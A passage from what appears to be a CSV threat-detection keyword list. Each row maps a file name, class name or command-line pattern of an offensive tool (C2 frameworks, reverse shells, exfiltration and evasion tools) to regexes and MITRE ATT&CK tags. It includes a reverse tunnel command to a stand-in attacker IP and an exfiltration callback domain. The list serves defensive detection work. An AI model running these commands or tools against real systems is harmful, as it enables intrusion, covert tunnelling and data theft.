Plugin::Nemesis < Msf::Plugin*",".{0,1000}class\sPlugin\:\:Nemesis\s\<\sMsf\:\:Plugin.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*class ReverseBash*",".{0,1000}class\sReverseBash.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*class 
T2WRPCServer(*",".{0,1000}class\sT2WRPCServer\(.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*Cleanup-57BFF48E-24FB-48E9-A390-AC62ADF38B07.json*",".{0,1000}Cleanup\-57BFF48E\-24FB\-48E9\-A390\-AC62ADF38B07\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","5","421","37","2024-04-18T20:34:47Z","2022-06-14T11:40:21Z" "*clear_cmd",".{0,1000}clear_cmd","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. 
It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","247","72","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "*clear_command_history.py*",".{0,1000}clear_command_history\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*clear_me_from_history()?*",".{0,1000}clear_me_from_history\(\)\?.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","N/A","10","10","1302","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z" "*ClearEventlog.vbs*",".{0,1000}ClearEventlog\.vbs.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*ClearEventlog.vbs*",".{0,1000}ClearEventlog\.vbs.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" 
"*clem9669/hashcat-rule*",".{0,1000}clem9669\/hashcat\-rule.{0,1000}","offensive_tool_keyword","hashcat-rule","Rule for hashcat or john. Aiming to crack how people generate their password","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/clem9669/hashcat-rule","1","1","N/A","10","4","374","44","2024-04-02T12:03:31Z","2020-03-06T17:20:40Z" "*clem9669_case.rule*",".{0,1000}clem9669_case\.rule.{0,1000}","offensive_tool_keyword","hashcat-rule","Rule for hashcat or john. Aiming to crack how people generate their password","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/clem9669/hashcat-rule","1","1","N/A","10","4","374","44","2024-04-02T12:03:31Z","2020-03-06T17:20:40Z" "*clem9669_large.rule*",".{0,1000}clem9669_large\.rule.{0,1000}","offensive_tool_keyword","hashcat-rule","Rule for hashcat or john. Aiming to crack how people generate their password","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/clem9669/hashcat-rule","1","1","N/A","10","4","374","44","2024-04-02T12:03:31Z","2020-03-06T17:20:40Z" "*clem9669_medium.rule*",".{0,1000}clem9669_medium\.rule.{0,1000}","offensive_tool_keyword","hashcat-rule","Rule for hashcat or john. Aiming to crack how people generate their password","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/clem9669/hashcat-rule","1","1","N/A","10","4","374","44","2024-04-02T12:03:31Z","2020-03-06T17:20:40Z" "*clem9669_small.rule*",".{0,1000}clem9669_small\.rule.{0,1000}","offensive_tool_keyword","hashcat-rule","Rule for hashcat or john. 
Aiming to crack how people generate their password","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/clem9669/hashcat-rule","1","1","N/A","10","4","374","44","2024-04-02T12:03:31Z","2020-03-06T17:20:40Z" "*clem9669_wordlist_medium.7z*",".{0,1000}clem9669_wordlist_medium\.7z.{0,1000}","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","3","227","46","2024-05-01T14:27:57Z","2020-10-21T14:37:53Z" "*clem9669_wordlist_small.7z*",".{0,1000}clem9669_wordlist_small\.7z.{0,1000}","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","3","227","46","2024-05-01T14:27:57Z","2020-10-21T14:37:53Z" "*-cli install github *",".{0,1000}\-cli\sinstall\sgithub\s.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*-cli install github *Apollo.*",".{0,1000}\-cli\sinstall\sgithub\s.{0,1000}Apollo\..{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*-cli payload start *",".{0,1000}\-cli\spayload\sstart\s.{0,1000}","offensive_tool_keyword","mythic","A 
collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*click_to_exploit.docx*",".{0,1000}click_to_exploit\.docx.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/drgreenthumb93/CVE-2022-30190-follina","1","1","N/A","N/A","1","10","4","2023-04-20T20:34:05Z","2022-06-01T11:37:08Z" "*clickjack_attack.html*",".{0,1000}clickjack_attack\.html.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*clickjack_victim.html*",".{0,1000}clickjack_victim\.html.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*clickme*exploit.html*",".{0,1000}clickme.{0,1000}exploit\.html.{0,1000}","offensive_tool_keyword","POC","CVE-2022-30190 Follina POC","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/onecloudemoji/CVE-2022-30190","1","1","N/A","N/A","2","106","29","2022-05-31T09:35:37Z","2022-05-31T06:45:25Z" "*client $ATTACKER-IP:$ATTACKER-PORT R:$PORT:socks*",".{0,1000}client\s\$ATTACKER\-IP\:\$ATTACKER\-PORT\sR\:\$PORT\:socks.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*client.py --server-ip * --server-port *",".{0,1000}client\.py\s\-\-server\-ip\s.{0,1000}\s\-\-server\-port\s.{0,1000}","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","0","N/A","10","10","533","123","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" "*client.py*--domain*--hashes*",".{0,1000}client\.py.{0,1000}\-\-domain.{0,1000}\-\-hashes.{0,1000}","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","0","N/A","10","10","533","123","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" 
"*ClipboardImplant*",".{0,1000}ClipboardImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*clipboardinject.*",".{0,1000}clipboardinject\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*clipboardinject.x64*",".{0,1000}clipboardinject\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*clipboardinject.x86*",".{0,1000}clipboardinject\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*clipboard-monitor *",".{0,1000}clipboard\-monitor\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*ClipboardWindow-Inject*",".{0,1000}ClipboardWindow\-Inject.{0,1000}","offensive_tool_keyword","cobaltstrike","CLIPBRDWNDCLASS process injection technique(BOF) - execute beacon shellcode in callback","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - 
T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BronzeTicket/ClipboardWindow-Inject","1","1","N/A","10","10","63","11","2022-09-15T01:41:39Z","2022-09-14T15:55:06Z" "*clipmon.sln*",".{0,1000}clipmon\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" 
"*clndh3qilvdv6403g1n0hs3rhd6xpfmjn.oast.online*",".{0,1000}clndh3qilvdv6403g1n0hs3rhd6xpfmjn\.oast\.online.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","1","N/A","9","1","60","9","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z" "*cloakify*",".{0,1000}cloakify.{0,1000}","offensive_tool_keyword","cloakify","CloakifyFactory & the Cloakify Toolset - Data Exfiltration & Infiltration In Plain Sight. Evade DLP/MLS Devices. Social Engineering of Analysts. Defeat Data Whitelisting Controls. Evade AV Detection. Text-based steganography using lists. Convert any file type (e.g. executables. Office. Zip. images) into a list of everyday strings. Very simple tools. powerful concept. limited only by your imagination.","T1001 - T1003 - T1027 - T1036 - T1048 - T1052","TA0010","N/A","N/A","Data Exfiltration","https://github.com/TryCatchHCF/Cloakify","1","0","N/A","N/A","10","1496","228","2020-11-24T05:25:04Z","2016-05-07T04:52:26Z" "*CloakNDaggerC2-main*",".{0,1000}CloakNDaggerC2\-main.{0,1000}","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. 
This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","1","N/A","10","10","11","2","2024-04-26T19:45:06Z","2023-04-28T01:58:18Z" "*cloc.exe --exclude-dir*",".{0,1000}cloc\.exe\s\-\-exclude\-dir.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*cloud_enum-master.zip*",".{0,1000}cloud_enum\-master\.zip.{0,1000}","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","1","N/A","6","10","1476","217","2024-05-01T10:26:56Z","2019-05-31T09:14:05Z" "*cloudfail.py --target seo.com --tor*",".{0,1000}cloudfail\.py\s\-\-target\sseo\.com\s\-\-tor.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*cloudFilterEOP.exe*",".{0,1000}cloudFilterEOP\.exe.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Cloudflared and Loclx have started successfully!*",".{0,1000}Cloudflared\sand\sLoclx\shave\sstarted\ssuccessfully!.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*Cloudflared has started successfully!*",".{0,1000}Cloudflared\shas\sstarted\ssuccessfully!.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. 
If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*cloudmapper collect --account parent --profile parent*",".{0,1000}cloudmapper\scollect\s\-\-account\sparent\s\-\-profile\sparent.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*cloudmapper configure add-account --config-file config.json --name parent --id XXX --default true*",".{0,1000}cloudmapper\sconfigure\sadd\-account\s\-\-config\-file\sconfig\.json\s\-\-name\sparent\s\-\-id\sXXX\s\-\-default\strue.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*cloudmapper configure discover-organization-accounts*",".{0,1000}cloudmapper\sconfigure\sdiscover\-organization\-accounts.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*cloudsplaining 
create-multi-account-config-file -o accounts.yml*",".{0,1000}cloudsplaining\screate\-multi\-account\-config\-file\s\-o\saccounts\.yml.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*cloudsplaining download --profile someprofile*",".{0,1000}cloudsplaining\sdownload\s\-\-profile\ssomeprofile.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*cloudsplaining scan --input-file default.json*",".{0,1000}cloudsplaining\sscan\s\-\-input\-file\sdefault\.json.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*cloudsplaining scan-multi-account -c accounts.yml -r TargetRole --output-directory ./*",".{0,1000}cloudsplaining\sscan\-multi\-account\s\-c\saccounts\.yml\s\-r\sTargetRole\s\-\-output\-directory\s\.\/.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - 
TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*cloudsplaining scan-policy-file --input-file examples/policies/wildcards.json*",".{0,1000}cloudsplaining\sscan\-policy\-file\s\-\-input\-file\sexamples\/policies\/wildcards\.json.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*cloudsploit *",".{0,1000}cloudsploit\s.{0,1000}","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","0","N/A","N/A","10","3180","651","2024-05-01T18:06:46Z","2015-06-29T15:33:40Z" "*cloudsploit*cloudtrail*",".{0,1000}cloudsploit.{0,1000}cloudtrail.{0,1000}","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google 